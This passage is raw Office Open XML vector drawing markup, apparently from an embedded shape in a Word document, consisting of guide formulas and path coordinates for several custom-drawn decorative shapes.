                                  <a:gd name="T38" fmla="*/ 129 w 1665"/>
                                  <a:gd name="T39" fmla="*/ 13 h 18"/>
                                  <a:gd name="T40" fmla="*/ 93 w 1665"/>
                                  <a:gd name="T41" fmla="*/ 13 h 18"/>
                                  <a:gd name="T42" fmla="*/ 62 w 1665"/>
                                  <a:gd name="T43" fmla="*/ 13 h 18"/>
                                  <a:gd name="T44" fmla="*/ 42 w 1665"/>
                                  <a:gd name="T45" fmla="*/ 13 h 18"/>
                                  <a:gd name="T46" fmla="*/ 21 w 1665"/>
                                  <a:gd name="T47" fmla="*/ 13 h 18"/>
                                  <a:gd name="T48" fmla="*/ 11 w 1665"/>
                                  <a:gd name="T49" fmla="*/ 13 h 18"/>
                                  <a:gd name="T50" fmla="*/ 5 w 1665"/>
                                  <a:gd name="T51" fmla="*/ 13 h 18"/>
                                  <a:gd name="T52" fmla="*/ 0 w 1665"/>
                                  <a:gd name="T53" fmla="*/ 9 h 18"/>
                                  <a:gd name="T54" fmla="*/ 5 w 1665"/>
                                  <a:gd name="T55" fmla="*/ 5 h 18"/>
                                  <a:gd name="T56" fmla="*/ 11 w 1665"/>
                                  <a:gd name="T57" fmla="*/ 5 h 18"/>
                                  <a:gd name="T58" fmla="*/ 21 w 1665"/>
                                  <a:gd name="T59" fmla="*/ 5 h 18"/>
                                  <a:gd name="T60" fmla="*/ 42 w 1665"/>
                                  <a:gd name="T61" fmla="*/ 5 h 18"/>
                                  <a:gd name="T62" fmla="*/ 73 w 1665"/>
                                  <a:gd name="T63" fmla="*/ 5 h 18"/>
                                  <a:gd name="T64" fmla="*/ 114 w 1665"/>
                                  <a:gd name="T65" fmla="*/ 0 h 18"/>
                                  <a:gd name="T66" fmla="*/ 155 w 1665"/>
                                  <a:gd name="T67" fmla="*/ 0 h 18"/>
                                  <a:gd name="T68" fmla="*/ 202 w 1665"/>
                                  <a:gd name="T69" fmla="*/ 0 h 18"/>
                                  <a:gd name="T70" fmla="*/ 259 w 1665"/>
                                  <a:gd name="T71" fmla="*/ 0 h 18"/>
                                  <a:gd name="T72" fmla="*/ 321 w 1665"/>
                                  <a:gd name="T73" fmla="*/ 0 h 18"/>
                                  <a:gd name="T74" fmla="*/ 383 w 1665"/>
                                  <a:gd name="T75" fmla="*/ 0 h 18"/>
                                  <a:gd name="T76" fmla="*/ 522 w 1665"/>
                                  <a:gd name="T77" fmla="*/ 0 h 18"/>
                                  <a:gd name="T78" fmla="*/ 667 w 1665"/>
                                  <a:gd name="T79" fmla="*/ 0 h 18"/>
                                  <a:gd name="T80" fmla="*/ 822 w 1665"/>
                                  <a:gd name="T81" fmla="*/ 0 h 18"/>
                                  <a:gd name="T82" fmla="*/ 972 w 1665"/>
                                  <a:gd name="T83" fmla="*/ 0 h 18"/>
                                  <a:gd name="T84" fmla="*/ 1122 w 1665"/>
                                  <a:gd name="T85" fmla="*/ 0 h 18"/>
                                  <a:gd name="T86" fmla="*/ 1256 w 1665"/>
                                  <a:gd name="T87" fmla="*/ 0 h 18"/>
                                  <a:gd name="T88" fmla="*/ 1323 w 1665"/>
                                  <a:gd name="T89" fmla="*/ 0 h 18"/>
                                  <a:gd name="T90" fmla="*/ 1380 w 1665"/>
                                  <a:gd name="T91" fmla="*/ 0 h 18"/>
                                  <a:gd name="T92" fmla="*/ 1437 w 1665"/>
                                  <a:gd name="T93" fmla="*/ 0 h 18"/>
                                  <a:gd name="T94" fmla="*/ 1489 w 1665"/>
                                  <a:gd name="T95" fmla="*/ 0 h 18"/>
                                  <a:gd name="T96" fmla="*/ 1530 w 1665"/>
                                  <a:gd name="T97" fmla="*/ 0 h 18"/>
                                  <a:gd name="T98" fmla="*/ 1566 w 1665"/>
                                  <a:gd name="T99" fmla="*/ 0 h 18"/>
                                  <a:gd name="T100" fmla="*/ 1597 w 1665"/>
                                  <a:gd name="T101" fmla="*/ 0 h 18"/>
                                  <a:gd name="T102" fmla="*/ 1618 w 1665"/>
                                  <a:gd name="T103" fmla="*/ 0 h 18"/>
                                  <a:gd name="T104" fmla="*/ 1634 w 1665"/>
                                  <a:gd name="T105" fmla="*/ 0 h 18"/>
                                  <a:gd name="T106" fmla="*/ 1639 w 1665"/>
                                  <a:gd name="T10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5" h="18">
                                    <a:moveTo>
                                      <a:pt x="1639" y="0"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="1665" y="9"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1654" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1618" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1577" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1530" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1479" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1427" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1365" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1241" y="18"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1112" y="18"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="972" y="18"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="693" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="558" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="429" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="315" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="264" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="217" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="171" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="129" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="93" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="42" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="11" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="9"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="5"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="11" y="5"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="5"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="42" y="5"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="73" y="5"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="114" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="155" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="202" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="259" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="321" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="383" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="522" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="667" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="822" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="972" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1122" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1256" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1323" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1380" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1437" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1489" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1530" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1566" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1597" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1618" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1634" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1639" y="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283"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7700" y="2888"/>
                                <a:ext cx="11" cy="13"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 11 w 11"/>
                                  <a:gd name="T1" fmla="*/ 13 h 13"/>
                                  <a:gd name="T2" fmla="*/ 0 w 11"/>
                                  <a:gd name="T3" fmla="*/ 0 h 13"/>
                                  <a:gd name="T4" fmla="*/ 11 w 11"/>
                                  <a:gd name="T5" fmla="*/ 9 h 13"/>
                                  <a:gd name="T6" fmla="*/ 11 w 11"/>
                                  <a:gd name="T7" fmla="*/ 13 h 13"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst>
                                  <a:cxn ang="0">
                                    <a:pos x="T0" y="T1"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T2" y="T3"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T4" y="T5"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T6" y="T7"/>
                                  </a:cxn>
                                </a:cxnLst>
                                <a:rect l="0" t="0" r="r" b="b"/>
                                <a:pathLst>
                                  <a:path w="11" h="13">
                                    <a:moveTo>
                                      <a:pt x="11" y="13"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="11" y="9"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="11"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284"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="9804" y="2884"/>
                                <a:ext cx="57" cy="52"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 57 w 57"/>
                                  <a:gd name="T1" fmla="*/ 52 h 52"/>
                                  <a:gd name="T2" fmla="*/ 36 w 57"/>
                                  <a:gd name="T3" fmla="*/ 52 h 52"/>
                                  <a:gd name="T4" fmla="*/ 21 w 57"/>
                                  <a:gd name="T5" fmla="*/ 43 h 52"/>
                                  <a:gd name="T6" fmla="*/ 10 w 57"/>
                                  <a:gd name="T7" fmla="*/ 35 h 52"/>
                                  <a:gd name="T8" fmla="*/ 0 w 57"/>
                                  <a:gd name="T9" fmla="*/ 26 h 52"/>
                                  <a:gd name="T10" fmla="*/ 0 w 57"/>
                                  <a:gd name="T11" fmla="*/ 22 h 52"/>
                                  <a:gd name="T12" fmla="*/ 10 w 57"/>
                                  <a:gd name="T13" fmla="*/ 13 h 52"/>
                                  <a:gd name="T14" fmla="*/ 26 w 57"/>
                                  <a:gd name="T15" fmla="*/ 4 h 52"/>
                                  <a:gd name="T16" fmla="*/ 57 w 57"/>
                                  <a:gd name="T17" fmla="*/ 0 h 52"/>
                                  <a:gd name="T18" fmla="*/ 57 w 57"/>
                                  <a:gd name="T19"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2">
                                    <a:moveTo>
                                      <a:pt x="57" y="52"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="5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285"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="9504" y="2888"/>
                                <a:ext cx="124" cy="48"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 83 w 124"/>
                                  <a:gd name="T1" fmla="*/ 13 h 48"/>
                                  <a:gd name="T2" fmla="*/ 93 w 124"/>
                                  <a:gd name="T3" fmla="*/ 18 h 48"/>
                                  <a:gd name="T4" fmla="*/ 104 w 124"/>
                                  <a:gd name="T5" fmla="*/ 22 h 48"/>
                                  <a:gd name="T6" fmla="*/ 114 w 124"/>
                                  <a:gd name="T7" fmla="*/ 22 h 48"/>
                                  <a:gd name="T8" fmla="*/ 124 w 124"/>
                                  <a:gd name="T9" fmla="*/ 26 h 48"/>
                                  <a:gd name="T10" fmla="*/ 104 w 124"/>
                                  <a:gd name="T11" fmla="*/ 31 h 48"/>
                                  <a:gd name="T12" fmla="*/ 88 w 124"/>
                                  <a:gd name="T13" fmla="*/ 39 h 48"/>
                                  <a:gd name="T14" fmla="*/ 73 w 124"/>
                                  <a:gd name="T15" fmla="*/ 48 h 48"/>
                                  <a:gd name="T16" fmla="*/ 36 w 124"/>
                                  <a:gd name="T17" fmla="*/ 39 h 48"/>
                                  <a:gd name="T18" fmla="*/ 0 w 124"/>
                                  <a:gd name="T19" fmla="*/ 22 h 48"/>
                                  <a:gd name="T20" fmla="*/ 16 w 124"/>
                                  <a:gd name="T21" fmla="*/ 18 h 48"/>
                                  <a:gd name="T22" fmla="*/ 36 w 124"/>
                                  <a:gd name="T23" fmla="*/ 9 h 48"/>
                                  <a:gd name="T24" fmla="*/ 73 w 124"/>
                                  <a:gd name="T25" fmla="*/ 0 h 48"/>
                                  <a:gd name="T26" fmla="*/ 83 w 124"/>
                                  <a:gd name="T27" fmla="*/ 1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4" h="48">
                                    <a:moveTo>
                                      <a:pt x="83" y="13"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="93" y="18"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="104" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="114" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="124" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="104" y="31"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="88" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="73" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="16" y="18"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="9"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="73" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="83"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86"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7566" y="2906"/>
                                <a:ext cx="1215" cy="1026"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 1116 w 1215"/>
                                  <a:gd name="T1" fmla="*/ 13 h 1026"/>
                                  <a:gd name="T2" fmla="*/ 1153 w 1215"/>
                                  <a:gd name="T3" fmla="*/ 90 h 1026"/>
                                  <a:gd name="T4" fmla="*/ 1189 w 1215"/>
                                  <a:gd name="T5" fmla="*/ 82 h 1026"/>
                                  <a:gd name="T6" fmla="*/ 1018 w 1215"/>
                                  <a:gd name="T7" fmla="*/ 108 h 1026"/>
                                  <a:gd name="T8" fmla="*/ 646 w 1215"/>
                                  <a:gd name="T9" fmla="*/ 21 h 1026"/>
                                  <a:gd name="T10" fmla="*/ 775 w 1215"/>
                                  <a:gd name="T11" fmla="*/ 194 h 1026"/>
                                  <a:gd name="T12" fmla="*/ 662 w 1215"/>
                                  <a:gd name="T13" fmla="*/ 467 h 1026"/>
                                  <a:gd name="T14" fmla="*/ 662 w 1215"/>
                                  <a:gd name="T15" fmla="*/ 415 h 1026"/>
                                  <a:gd name="T16" fmla="*/ 605 w 1215"/>
                                  <a:gd name="T17" fmla="*/ 459 h 1026"/>
                                  <a:gd name="T18" fmla="*/ 594 w 1215"/>
                                  <a:gd name="T19" fmla="*/ 346 h 1026"/>
                                  <a:gd name="T20" fmla="*/ 744 w 1215"/>
                                  <a:gd name="T21" fmla="*/ 225 h 1026"/>
                                  <a:gd name="T22" fmla="*/ 729 w 1215"/>
                                  <a:gd name="T23" fmla="*/ 212 h 1026"/>
                                  <a:gd name="T24" fmla="*/ 662 w 1215"/>
                                  <a:gd name="T25" fmla="*/ 242 h 1026"/>
                                  <a:gd name="T26" fmla="*/ 682 w 1215"/>
                                  <a:gd name="T27" fmla="*/ 264 h 1026"/>
                                  <a:gd name="T28" fmla="*/ 646 w 1215"/>
                                  <a:gd name="T29" fmla="*/ 294 h 1026"/>
                                  <a:gd name="T30" fmla="*/ 512 w 1215"/>
                                  <a:gd name="T31" fmla="*/ 320 h 1026"/>
                                  <a:gd name="T32" fmla="*/ 424 w 1215"/>
                                  <a:gd name="T33" fmla="*/ 229 h 1026"/>
                                  <a:gd name="T34" fmla="*/ 470 w 1215"/>
                                  <a:gd name="T35" fmla="*/ 116 h 1026"/>
                                  <a:gd name="T36" fmla="*/ 620 w 1215"/>
                                  <a:gd name="T37" fmla="*/ 86 h 1026"/>
                                  <a:gd name="T38" fmla="*/ 605 w 1215"/>
                                  <a:gd name="T39" fmla="*/ 181 h 1026"/>
                                  <a:gd name="T40" fmla="*/ 677 w 1215"/>
                                  <a:gd name="T41" fmla="*/ 86 h 1026"/>
                                  <a:gd name="T42" fmla="*/ 393 w 1215"/>
                                  <a:gd name="T43" fmla="*/ 155 h 1026"/>
                                  <a:gd name="T44" fmla="*/ 408 w 1215"/>
                                  <a:gd name="T45" fmla="*/ 394 h 1026"/>
                                  <a:gd name="T46" fmla="*/ 108 w 1215"/>
                                  <a:gd name="T47" fmla="*/ 372 h 1026"/>
                                  <a:gd name="T48" fmla="*/ 134 w 1215"/>
                                  <a:gd name="T49" fmla="*/ 580 h 1026"/>
                                  <a:gd name="T50" fmla="*/ 176 w 1215"/>
                                  <a:gd name="T51" fmla="*/ 498 h 1026"/>
                                  <a:gd name="T52" fmla="*/ 119 w 1215"/>
                                  <a:gd name="T53" fmla="*/ 459 h 1026"/>
                                  <a:gd name="T54" fmla="*/ 191 w 1215"/>
                                  <a:gd name="T55" fmla="*/ 415 h 1026"/>
                                  <a:gd name="T56" fmla="*/ 284 w 1215"/>
                                  <a:gd name="T57" fmla="*/ 372 h 1026"/>
                                  <a:gd name="T58" fmla="*/ 372 w 1215"/>
                                  <a:gd name="T59" fmla="*/ 472 h 1026"/>
                                  <a:gd name="T60" fmla="*/ 336 w 1215"/>
                                  <a:gd name="T61" fmla="*/ 562 h 1026"/>
                                  <a:gd name="T62" fmla="*/ 202 w 1215"/>
                                  <a:gd name="T63" fmla="*/ 614 h 1026"/>
                                  <a:gd name="T64" fmla="*/ 300 w 1215"/>
                                  <a:gd name="T65" fmla="*/ 623 h 1026"/>
                                  <a:gd name="T66" fmla="*/ 429 w 1215"/>
                                  <a:gd name="T67" fmla="*/ 493 h 1026"/>
                                  <a:gd name="T68" fmla="*/ 553 w 1215"/>
                                  <a:gd name="T69" fmla="*/ 575 h 1026"/>
                                  <a:gd name="T70" fmla="*/ 527 w 1215"/>
                                  <a:gd name="T71" fmla="*/ 562 h 1026"/>
                                  <a:gd name="T72" fmla="*/ 264 w 1215"/>
                                  <a:gd name="T73" fmla="*/ 653 h 1026"/>
                                  <a:gd name="T74" fmla="*/ 36 w 1215"/>
                                  <a:gd name="T75" fmla="*/ 536 h 1026"/>
                                  <a:gd name="T76" fmla="*/ 134 w 1215"/>
                                  <a:gd name="T77" fmla="*/ 866 h 1026"/>
                                  <a:gd name="T78" fmla="*/ 108 w 1215"/>
                                  <a:gd name="T79" fmla="*/ 1004 h 1026"/>
                                  <a:gd name="T80" fmla="*/ 93 w 1215"/>
                                  <a:gd name="T81" fmla="*/ 961 h 1026"/>
                                  <a:gd name="T82" fmla="*/ 31 w 1215"/>
                                  <a:gd name="T83" fmla="*/ 1008 h 1026"/>
                                  <a:gd name="T84" fmla="*/ 46 w 1215"/>
                                  <a:gd name="T85" fmla="*/ 879 h 1026"/>
                                  <a:gd name="T86" fmla="*/ 52 w 1215"/>
                                  <a:gd name="T87" fmla="*/ 688 h 1026"/>
                                  <a:gd name="T88" fmla="*/ 36 w 1215"/>
                                  <a:gd name="T89" fmla="*/ 827 h 1026"/>
                                  <a:gd name="T90" fmla="*/ 129 w 1215"/>
                                  <a:gd name="T91" fmla="*/ 766 h 1026"/>
                                  <a:gd name="T92" fmla="*/ 72 w 1215"/>
                                  <a:gd name="T93" fmla="*/ 363 h 1026"/>
                                  <a:gd name="T94" fmla="*/ 10 w 1215"/>
                                  <a:gd name="T95" fmla="*/ 277 h 1026"/>
                                  <a:gd name="T96" fmla="*/ 134 w 1215"/>
                                  <a:gd name="T97" fmla="*/ 255 h 1026"/>
                                  <a:gd name="T98" fmla="*/ 62 w 1215"/>
                                  <a:gd name="T99" fmla="*/ 281 h 1026"/>
                                  <a:gd name="T100" fmla="*/ 419 w 1215"/>
                                  <a:gd name="T101" fmla="*/ 368 h 1026"/>
                                  <a:gd name="T102" fmla="*/ 300 w 1215"/>
                                  <a:gd name="T103" fmla="*/ 60 h 1026"/>
                                  <a:gd name="T104" fmla="*/ 295 w 1215"/>
                                  <a:gd name="T105" fmla="*/ 134 h 1026"/>
                                  <a:gd name="T106" fmla="*/ 284 w 1215"/>
                                  <a:gd name="T107" fmla="*/ 17 h 1026"/>
                                  <a:gd name="T108" fmla="*/ 382 w 1215"/>
                                  <a:gd name="T109" fmla="*/ 121 h 1026"/>
                                  <a:gd name="T110" fmla="*/ 579 w 1215"/>
                                  <a:gd name="T111" fmla="*/ 4 h 1026"/>
                                  <a:gd name="T112" fmla="*/ 1003 w 1215"/>
                                  <a:gd name="T113" fmla="*/ 77 h 1026"/>
                                  <a:gd name="T114" fmla="*/ 925 w 1215"/>
                                  <a:gd name="T115" fmla="*/ 77 h 1026"/>
                                  <a:gd name="T116" fmla="*/ 972 w 1215"/>
                                  <a:gd name="T117" fmla="*/ 4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15" h="1026">
                                    <a:moveTo>
                                      <a:pt x="1013" y="21"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="1023" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1023" y="56"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1008" y="90"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1013" y="95"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1023" y="95"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1044" y="56"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1060" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1085" y="21"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1116" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1142" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1168" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1199" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1209" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1215" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1215" y="77"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1209" y="86"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1194" y="90"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1168" y="95"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1153" y="90"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1142" y="82"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1142" y="73"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1142" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1147" y="60"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1163" y="56"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1168" y="56"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1178" y="60"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1184" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1184" y="73"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1189" y="82"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1199" y="82"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1204" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1204" y="60"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1199" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1194" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1178" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1147" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1122" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1070" y="77"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1018" y="108"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="992" y="121"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="961" y="125"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="925" y="125"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="889" y="121"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="853" y="112"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="817" y="95"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="693" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="672" y="21"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="656" y="21"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="646" y="21"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="646" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="646" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="651" y="34"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="677" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="698" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="734" y="77"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="755" y="103"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="770" y="134"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="775" y="164"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="775" y="194"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="760" y="233"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="734" y="264"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="687" y="324"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="636" y="376"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="620" y="411"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="620" y="428"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="625" y="446"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="641" y="459"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="651" y="467"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="662" y="467"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="677" y="463"/>
                                    </a:lnTo>
                                    <a:lnTo>
